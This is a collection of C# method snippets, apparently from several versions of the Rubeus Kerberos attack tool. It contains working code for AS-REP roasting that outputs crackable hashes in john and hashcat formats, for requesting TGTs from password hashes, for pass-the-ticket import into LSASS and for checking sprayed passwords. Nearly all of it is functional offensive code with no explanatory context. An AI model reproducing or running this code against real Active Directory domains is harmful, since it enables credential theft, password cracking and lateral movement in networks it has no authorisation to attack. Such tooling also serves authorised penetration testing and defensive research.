public static byte[] TGT(string userName, string domain, string certFile, string certPass, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool verifyCerts = false, string servicekey = "", bool getCredentials = false) { try { X509Certificate2 cert = FindCertificate(certFile, certPass); // Check for Base64 encoded certificate second in case certFile was a hex-encoded fingerprint if (cert == null && Helpers.IsBase64String(certFile)) { cert = new X509Certificate2(Convert.FromBase64String(certFile), certPass); } if (cert == null) { Console.WriteLine("[!] Failed to find certificate for {0}", certFile); return(null); } KDCKeyAgreement agreement = new KDCKeyAgreement(); Console.WriteLine("[*] Using PKINIT with etype {0} and subject: {1} ", etype, cert.Subject); Console.WriteLine("[*] Building AS-REQ (w/ PKINIT preauth) for: '{0}\\{1}'", domain, userName); AS_REQ pkinitASREQ = AS_REQ.NewASReq(userName, domain, cert, agreement, etype, verifyCerts); return(InnerTGT(pkinitASREQ, etype, outfile, ptt, domainController, luid, describe, true, false, servicekey, getCredentials)); } catch (KerberosErrorException ex) { KRB_ERROR error = ex.krbError; Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code); } catch (RubeusException ex) { Console.WriteLine("\r\n" + ex.Message + "\r\n"); } return(null); }
public static byte[] TGT(string userName, string domain, string certFile, string certPass, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false) { try { X509Certificate2 cert = FindCertificate(certFile, certPass); if (cert == null) { Console.WriteLine("[!] Failed to find certificate for {0}", certFile); return(null); } KDCKeyAgreement agreement = new KDCKeyAgreement(); Console.WriteLine("[*] Using PKINIT with etype {0} and subject: {1} ", etype, cert.Subject); Console.WriteLine("[*] Building AS-REQ (w/ PKINIT preauth) for: '{0}\\{1}'", domain, userName); AS_REQ pkinitASREQ = AS_REQ.NewASReq(userName, domain, cert, agreement, etype); return(InnerTGT(pkinitASREQ, etype, outfile, ptt, domainController, luid, describe, true)); } catch (KerberosErrorException ex) { KRB_ERROR error = ex.krbError; Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code); } catch (RubeusException ex) { Console.WriteLine("\r\n" + ex.Message + "\r\n"); } return(null); }
public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false, bool opsec = false, string servicekey = "", bool changepw = false) { // send request without Pre-Auth to emulate genuine traffic bool preauth = false; if (opsec) { preauth = NoPreAuthTGT(userName, domain, keyString, etype, domainController, outfile, ptt, luid, describe, true); } try { // if AS-REQ without pre-auth worked don't bother sending AS-REQ with pre-auth if (!preauth) { Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString); Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName); AS_REQ userHashASREQ = AS_REQ.NewASReq(userName, domain, keyString, etype, opsec, changepw); return(InnerTGT(userHashASREQ, etype, outfile, ptt, domainController, luid, describe, true, opsec, servicekey)); } } catch (KerberosErrorException ex) { KRB_ERROR error = ex.krbError; Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code); } catch (RubeusException ex) { Console.WriteLine("\r\n" + ex.Message + "\r\n"); } return(null); }
public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "") { // roast AS-REPs for users without pre-authentication enabled Console.WriteLine("[*] Action: AS-REP Roasting"); string dcIP = Networking.GetDCIP(domainController); if (string.IsNullOrEmpty(dcIP)) { return; } Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName); byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac); byte[] response = Networking.SendBytes(dcIP, 88, reqBytes); if (null == response) { return; } // decode the supplied bytes to an AsnElt object // false == ignore trailing garbage AsnElt responseAsn = AsnElt.Decode(response, false); // check the response value int responseTag = responseAsn.TagValue; switch (responseTag) { case 11: Console.WriteLine("[+] AS-REQ w/o preauth successful!"); // parse the response to an AS-REP AS_REP rep = new AS_REP(response); // output the hash of the encrypted KERB-CRED in a crackable hash form string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty); repHash = repHash.Insert(32, "$"); string hashString = (format == "john") ? string.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash) // eventual hashcat format : string.Format("$krb5asrep${0}$*{1}${2}*${3}${4}", (int)Interop.KERB_ETYPE.rc4_hmac, userName, domain, repHash.Substring(0, 32), repHash.Substring(32)); Console.WriteLine("[*] AS-REP hash:\r\n"); // display the base64 of a hash, columns of 80 chararacters foreach (string line in Helpers.Split(hashString, 80)) { Console.WriteLine(" {0}", line); } return; case 30: Helpers.DisplayKerberosError(responseAsn); return; default: Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag); return; } }
private void GetUsernamePasswordTGT(string username, string password) { Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1; string salt = String.Format("{0}{1}", domain.ToUpper(), username); string hash = Crypto.KerberosPasswordHash(encType, password, salt); AS_REQ unpwAsReq = AS_REQ.NewASReq(username, domain, hash, encType); byte[] TGT = Ask.InnerTGT(unpwAsReq, encType, null, false, this.dc); this.ReportValidPassword(username, password, TGT); }
private void GetUsernamePasswordTGT(string username, string hash, string password, Interop.KERB_ETYPE encType) { AS_REQ unpwAsReq = AS_REQ.NewASReq(username, domain, hash, encType); byte[] TGT = Ask.InnerTGT(unpwAsReq, encType, null, false, this.dc); if (!string.IsNullOrEmpty(password)) { this.ReportValidPassword(username, password, TGT); } else { this.ReportValidPassword(username, hash, TGT); } }
private void GetUsernamePasswordTGT(string username, string password) { Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1; string salt = String.Format("{0}{1}", domain.ToUpper(), username.ToLower()); // special case for computer account salts if (username.EndsWith("$")) { salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), username.TrimEnd('$').ToLower(), domain.ToLower()); } string hash = Crypto.KerberosPasswordHash(encType, password, salt); AS_REQ unpwAsReq = AS_REQ.NewASReq(username, domain, hash, encType); byte[] TGT = Ask.InnerTGT(unpwAsReq, encType, null, false, this.dc); this.ReportValidPassword(username, password, TGT); }
public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string outfile, bool ptt, string domainController = "", LUID luid = new LUID(), bool describe = false) { try { Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString); Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName); AS_REQ userHashASREQ = AS_REQ.NewASReq(userName, domain, keyString, etype); return(InnerTGT(userHashASREQ, etype, outfile, ptt, domainController, luid, describe, true)); } catch (KerberosErrorException ex) { KRB_ERROR error = ex.krbError; Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code); } catch (RubeusException ex) { Console.WriteLine("\r\n" + ex.Message + "\r\n"); } return(null); }
public static bool NoPreAuthTGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string domainController, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false) { string dcIP = Networking.GetDCIP(domainController, true, domain); if (String.IsNullOrEmpty(dcIP)) { return(false); } AS_REQ NoPreAuthASREQ = AS_REQ.NewASReq(userName, domain, etype, true); byte[] reqBytes = NoPreAuthASREQ.Encode().Encode(); byte[] response = Networking.SendBytes(dcIP, 88, reqBytes); if (response == null) { return(false); } // decode the supplied bytes to an AsnElt object // false == ignore trailing garbage AsnElt responseAsn = AsnElt.Decode(response, false); // check the response value int responseTag = responseAsn.TagValue; if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP) { Console.WriteLine("[-] AS-REQ w/o preauth successful! {0} has pre-authentication disabled!", userName); byte[] kirbiBytes = HandleASREP(responseAsn, etype, keyString, outfile, ptt, luid, describe, verbose); return(true); } return(false); }
public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "", string outFile = "") { // roast AS-REPs for users without pre-authentication enabled string dcIP = Networking.GetDCIP(domainController, true, domain); if (String.IsNullOrEmpty(dcIP)) { return; } Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName); byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac).Encode().Encode(); byte[] response = Networking.SendBytes(dcIP, 88, reqBytes); if (response == null) { return; } // decode the supplied bytes to an AsnElt object // false == ignore trailing garbage AsnElt responseAsn = AsnElt.Decode(response, false); // check the response value int responseTag = responseAsn.TagValue; if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP) { Console.WriteLine("[+] AS-REQ w/o preauth successful!"); // parse the response to an AS-REP AS_REP rep = new AS_REP(response); // output the hash of the encrypted KERB-CRED in a crackable hash form string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty); repHash = repHash.Insert(32, "$"); string hashString = ""; if (format == "john") { hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash); } else if (format == "hashcat") { hashString = String.Format("$krb5asrep$23${0}@{1}:{2}", userName, domain, repHash); } else { Console.WriteLine("Please provide a cracking format."); } if (!String.IsNullOrEmpty(outFile)) { string outFilePath = Path.GetFullPath(outFile); try { File.AppendAllText(outFilePath, hashString + Environment.NewLine); } catch (Exception e) { Console.WriteLine("Exception: {0}", e.Message); } Console.WriteLine("[*] Hash written to {0}\r\n", outFilePath); } else { Console.WriteLine("[*] AS-REP hash:\r\n"); // display the base64 of a hash, columns of 80 chararacters if (Rubeus.Program.wrapTickets) { foreach (string line in Helpers.Split(hashString, 80)) { Console.WriteLine(" {0}", line); } } else { Console.WriteLine(" {0}", hashString); } Console.WriteLine(); } } else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR) { // parse the response to an KRB-ERROR KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]); Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code); } else { Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag); } }
public static byte[] TGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, bool ptt, string domainController = "", uint luid = 0) { Console.WriteLine("[*] Action: Ask TGT\r\n"); Console.WriteLine("[*] Using {0} hash: {1}", etype, keyString); if (luid != 0) { Console.WriteLine("[*] Target LUID : {0}", luid); } string dcIP = Networking.GetDCIP(domainController); if (String.IsNullOrEmpty(dcIP)) { return(null); } Console.WriteLine("[*] Building AS-REQ (w/ preauth) for: '{0}\\{1}'", domain, userName); byte[] reqBytes = AS_REQ.NewASReq(userName, domain, keyString, etype); byte[] response = Networking.SendBytes(dcIP, 88, reqBytes); if (response == null) { return(null); } // decode the supplied bytes to an AsnElt object // false == ignore trailing garbage AsnElt responseAsn = AsnElt.Decode(response, false); // check the response value int responseTag = responseAsn.TagValue; if (responseTag == 11) { Console.WriteLine("[+] TGT request successful!"); // parse the response to an AS-REP AS_REP rep = new AS_REP(responseAsn); // convert the key string to bytes byte[] key = Helpers.StringToByteArray(keyString); // decrypt the enc_part containing the session key/etc. // TODO: error checking on the decryption "failing"... byte[] outBytes; if (etype == Interop.KERB_ETYPE.rc4_hmac) { // KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY = 8 outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher); } else if (etype == Interop.KERB_ETYPE.aes256_cts_hmac_sha1) { // KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY = 3 outBytes = Crypto.KerberosDecrypt(etype, Interop.KRB_KEY_USAGE_AS_REP_EP_SESSION_KEY, key, rep.enc_part.cipher); } else { Console.WriteLine("\r\n[X] Encryption type \"{0}\" not currently supported", etype); return(null); } AsnElt ae = AsnElt.Decode(outBytes, false); EncKDCRepPart encRepPart = new EncKDCRepPart(ae.Sub[0]); // now build the final KRB-CRED structure KRB_CRED cred = new KRB_CRED(); // add the ticket cred.tickets.Add(rep.ticket); // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart KrbCredInfo info = new KrbCredInfo(); // [0] add in the session key info.key.keytype = encRepPart.key.keytype; info.key.keyvalue = encRepPart.key.keyvalue; // [1] prealm (domain) info.prealm = encRepPart.realm; // [2] pname (user) info.pname.name_type = rep.cname.name_type; info.pname.name_string = rep.cname.name_string; // [3] flags info.flags = encRepPart.flags; // [4] authtime (not required) // [5] starttime info.starttime = encRepPart.starttime; // [6] endtime info.endtime = encRepPart.endtime; // [7] renew-till info.renew_till = encRepPart.renew_till; // [8] srealm info.srealm = encRepPart.realm; // [9] sname info.sname.name_type = encRepPart.sname.name_type; info.sname.name_string = encRepPart.sname.name_string; // add the ticket_info into the cred object cred.enc_part.ticket_info.Add(info); byte[] kirbiBytes = cred.Encode().Encode(); string kirbiString = Convert.ToBase64String(kirbiBytes); Console.WriteLine("[*] base64(ticket.kirbi):\r\n", kirbiString); // display the .kirbi base64, columns of 80 chararacters foreach (string line in Helpers.Split(kirbiString, 80)) { Console.WriteLine(" {0}", line); } if (ptt || (luid != 0)) { // pass-the-ticket -> import into LSASS LSA.ImportTicket(kirbiBytes, luid); } return(kirbiBytes); } else if (responseTag == 30) { // parse the response to an KRB-ERROR KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]); Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code); return(null); } else { Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag); return(null); } }
public static void GetASRepHash(string userName, string domain, string domainController = "", string format = "") { // roast AS-REPs for users without pre-authentication enabled Console.WriteLine("[*] Action: AS-REP Roasting"); // grab the default DC if none was supplied if (String.IsNullOrEmpty(domainController)) { domainController = Networking.GetDCName(); if (String.IsNullOrEmpty(domainController)) { Console.WriteLine("[X] Error retrieving the current domain controller."); return; } } System.Net.IPAddress[] dcIP = null; try { dcIP = System.Net.Dns.GetHostAddresses(domainController); } catch (Exception e) { Console.WriteLine("[X] Error retrieving IP for domain controller \"{0}\" : {1}", domainController, e.Message); return; } Console.WriteLine("\r\n[*] Using domain controller: {0} ({1})", domainController, dcIP[0]); Console.WriteLine("[*] Building AS-REQ (w/o preauth) for: '{0}\\{1}'", domain, userName); byte[] reqBytes = AS_REQ.NewASReq(userName, domain, Interop.KERB_ETYPE.rc4_hmac); byte[] response = Networking.SendBytes(dcIP[0].ToString(), 88, reqBytes); if (response == null) { return; } // decode the supplied bytes to an AsnElt object // false == ignore trailing garbage AsnElt responseAsn = AsnElt.Decode(response, false); // check the response value int responseTag = responseAsn.TagValue; if (responseTag == 11) { Console.WriteLine("[+] AS-REQ w/o preauth successful!"); // parse the response to an AS-REP AS_REP rep = new AS_REP(response); // output the hash of the encrypted KERB-CRED in a crackable hash form string repHash = BitConverter.ToString(rep.enc_part.cipher).Replace("-", string.Empty); repHash = repHash.Insert(32, "$"); string hashString = ""; if (format == "john") { hashString = String.Format("$krb5asrep${0}@{1}:{2}", userName, domain, repHash); } else { // eventual hashcat format hashString = String.Format("$krb5asrep${0}$*{1}${2}*${3}${4}", (int)Interop.KERB_ETYPE.rc4_hmac, userName, domain, repHash.Substring(0, 32), repHash.Substring(32)); } Console.WriteLine("[*] AS-REP hash:\r\n"); // display the base64 of a hash, columns of 80 chararacters foreach (string line in Helpers.Split(hashString, 80)) { Console.WriteLine(" {0}", line); } } else if (responseTag == 30) { // parse the response to an KRB-ERROR KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]); Console.WriteLine("\r\n[X] KRB-ERROR ({0}) : {1}\r\n", error.error_code, (Interop.KERBEROS_ERROR)error.error_code); } else { Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag); } }
public static bool NoPreAuthTGT(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string domainController, string outfile, bool ptt, LUID luid = new LUID(), bool describe = false, bool verbose = false, string proxyUrl = null) { byte[] response = null; AS_REQ NoPreAuthASREQ = AS_REQ.NewASReq(userName, domain, etype, true); byte[] reqBytes = NoPreAuthASREQ.Encode().Encode(); if (String.IsNullOrEmpty(proxyUrl)) { string dcIP = Networking.GetDCIP(domainController, true, domain); if (String.IsNullOrEmpty(dcIP)) { return(false); } response = Networking.SendBytes(dcIP, 88, reqBytes); } else { KDC_PROXY_MESSAGE message = new KDC_PROXY_MESSAGE(reqBytes); message.target_domain = NoPreAuthASREQ.req_body.realm; response = Networking.MakeProxyRequest(proxyUrl, message); } if (response == null) { return(false); } // decode the supplied bytes to an AsnElt object AsnElt responseAsn = AsnElt.Decode(response); // check the response value int responseTag = responseAsn.TagValue; if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.AS_REP) { Console.WriteLine("[-] AS-REQ w/o preauth successful! {0} has pre-authentication disabled!", userName); byte[] kirbiBytes = HandleASREP(responseAsn, etype, keyString, outfile, ptt, luid, describe, verbose); return(true); } else if (responseTag == (int)Interop.KERB_MESSAGE_TYPE.ERROR) { // parse the response to an KRB-ERROR KRB_ERROR error = new KRB_ERROR(responseAsn.Sub[0]); if (error.error_code == (int)Interop.KERBEROS_ERROR.KDC_ERR_PREAUTH_REQUIRED) { Console.WriteLine("[!] Pre-Authentication required!"); foreach (PA_DATA pa_data in (List <PA_DATA>)error.e_data) { if (pa_data.type is Interop.PADATA_TYPE.ETYPE_INFO2) { if (((ETYPE_INFO2_ENTRY)pa_data.value).etype == (int)Interop.KERB_ETYPE.aes256_cts_hmac_sha1) { Console.WriteLine("[!]\tAES256 Salt: {0}", ((ETYPE_INFO2_ENTRY)pa_data.value).salt); } } } } } return(false); }